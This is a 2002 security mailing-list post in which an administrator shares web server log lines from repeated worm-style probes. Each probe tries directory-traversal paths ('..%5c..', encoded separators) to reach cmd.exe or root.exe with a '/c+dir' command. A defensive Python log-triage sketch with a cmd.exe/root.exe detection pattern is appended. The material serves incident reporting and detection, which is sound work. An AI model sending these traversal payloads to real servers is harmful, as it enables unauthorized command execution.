[Dshield] Web server attempt

Sue Young smy at gcmlp.com
Tue Jul 2 14:42:56 GMT 2002


This is the first time I've ever gotten hit from El Salvador -  This guy is
still hitting my web server today.  This is just a sample:

2002-07-01 22:39:02 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 -
2002-07-01 22:39:11 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 404 -
2002-07-01 22:39:13 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:15 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:18 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:23 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 22:39:25 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 500 -
2002-07-01 22:39:35 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:37 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:39 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:44 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:47 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:49 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:54 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:56 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:16 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 -
2002-07-01 23:11:22 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 404 -
2002-07-01 23:11:27 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:36 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:41 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 23:11:43 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 

Telefonica El Salvador (NETBLK-UU-63-81-36)
   65 Avenida Norte # 163
   Colonia Escalon, San Salvador SLV 
   SV

   Netname: UU-63-81-36
   Netblock: 63.81.36.0 - 63.81.39.255
   Maintainer: TDES

   Coordinator:
      IP TELCA, NOC Red  (SD176-ARIN)  noc.redip at telefonica.com.sv
      503-275-8550 (FAX) 503-275-6530


Sue Young
Grosvenor Capital Management
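
A triage sketch for log excerpts like the one above, added here as an example and not part of the original post: it rejoins the mail-wrapped lines, normalizes the `%5c` and `%2f` separators, and counts `cmd.exe`/`root.exe` requests per client and status code. The sample lines are constructed in the post's layout, the client addresses are documentation-range placeholders, and the field order is assumed from the excerpt.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in the same wrapped layout as the post; the client
# addresses are documentation-range placeholders, not the reported one.
SAMPLE = """\
2002-07-01 22:39:02 192.0.2.10 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 -
2002-07-01 22:39:18 192.0.2.10 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:23 192.0.2.10 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 22:39:56 192.0.2.10 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:40:10 192.0.2.77 - xxx.xxx.xxx.xxx 80 GET /index.html - 200 -
"""

START = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} ")
# Assumed field order: date time client user server port method stem query status
RECORD = re.compile(r"^(\S+ \S+) (\S+) \S+ \S+ (\d+) (\S+) (\S+) (\S+) (\d{3})\b")
SHELL = re.compile(r"/(cmd|root)\.exe$", re.I)

def rejoin(text):
    """Merge mail-wrapped continuation lines back into one record per request."""
    records = []
    for line in text.splitlines():
        if START.match(line) or not records:
            records.append(line.strip())
        elif line.strip():
            records[-1] += " " + line.strip()
    return records

def classify(record):
    """Return (client, status, reason) for a probe, or None for other traffic."""
    m = RECORD.match(record)
    if not m:
        return None
    _, client, _, _, stem, _, status = m.groups()
    path = unquote(stem).replace("\\", "/")  # %5c and %2f both end up as "/"
    if not SHELL.search(path):
        return None
    reason = "traversal" if "/../" in path else "direct"
    return client, int(status), reason

def summarize(text):
    """Count probes per (client, reason, status)."""
    hits = filter(None, map(classify, rejoin(text)))
    return Counter((c, r, s) for c, s, r in hits)
```

Calling `summarize()` on a saved excerpt gives one count per client, probe type and response code, which makes the responses that were not plain 404s easy to pick out for review.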



